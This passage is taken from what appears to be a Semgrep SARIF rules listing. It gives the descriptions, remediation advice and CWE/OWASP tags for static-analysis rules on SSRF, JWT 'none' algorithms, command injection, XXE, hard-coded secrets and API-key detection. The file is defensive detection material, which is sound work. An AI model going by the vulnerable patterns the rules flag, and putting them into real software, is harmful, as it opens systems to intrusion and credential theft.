crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","id":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","name":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg","id":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","name":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.jjwt.security.jwt-none-alg.jjwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"help":{"markdown":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown)\n","text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","id":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","name":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"help":{"markdown":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop)\n - [https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n","text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","id":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","name":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","id":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","name":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"help":{"markdown":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.no-send.bad-send)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb)\n - [https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html](https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html)\n","text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.no-send.bad-send","id":"ruby.lang.security.no-send.bad-send","name":"ruby.lang.security.no-send.bad-send","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.no-send.bad-send"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe","id":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","name":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-expat.security.audit.expat-xxe.expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"help":{"markdown":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure)\n - [https://golang.org/doc/go1.14#crypto/tls](https://golang.org/doc/go1.14#crypto/tls)\n - [https://www.us-cert.gov/ncas/alerts/TA14-290A](https://www.us-cert.gov/ncas/alerts/TA14-290A)\n","text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","id":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","name":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"help":{"markdown":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled)\n - [https://stackoverflow.com/a/7442668](https://stackoverflow.com/a/7442668)\n","text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","id":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","name":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","properties":{"precision":"very-high","tags":["CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences","LOW CONFIDENCE","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","id":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","name":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","id":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","name":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","id":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","name":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"help":{"markdown":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","id":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","name":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","id":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","name":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"help":{"markdown":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect","id":"generic.nginx.security.insecure-redirect.insecure-redirect","name":"generic.nginx.security.insecure-redirect.insecure-redirect","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-redirect.insecure-redirect"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"help":{"markdown":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded](https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded)\n","text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","id":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","name":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","properties":{"precision":"very-high","tags":["CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SendGrid API Key detected"},"help":{"markdown":"SendGrid API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SendGrid API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","id":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","name":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","id":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","name":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, 